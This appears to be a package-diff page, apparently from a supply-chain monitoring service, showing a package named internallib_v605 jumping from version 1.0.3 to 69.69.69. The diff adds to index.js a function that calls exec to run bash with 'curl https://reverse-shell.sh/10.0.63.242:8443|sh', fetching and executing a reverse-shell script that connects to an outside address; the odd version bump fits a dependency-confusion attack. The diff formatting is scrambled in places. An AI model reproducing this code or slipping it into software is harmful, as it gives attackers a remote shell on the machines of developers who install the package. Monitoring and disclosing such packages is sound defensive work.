internallib_v605 1.0.3 → 69.69.69
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +8 -6
- package/package.json +1 -1
package/index.js
CHANGED
@@ -1,7 +1,9 @@
|
|
1
|
-
|
2
|
-
|
1
|
+
exports.command = function() {
|
2
|
+
console.log("This is a message from the internal lib");
|
3
|
+
const { exec } = require('child_process');
|
3
4
|
exports.command = function(){
|
4
|
-
|
5
|
-
|
6
|
-
|
7
|
-
}
|
5
|
+
console.log("vert16x");
|
6
|
+
exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.63.242:8443|sh"');
|
7
|
+
return "Command Execute with Success";
|
8
|
+
}
|
9
|
+
}
|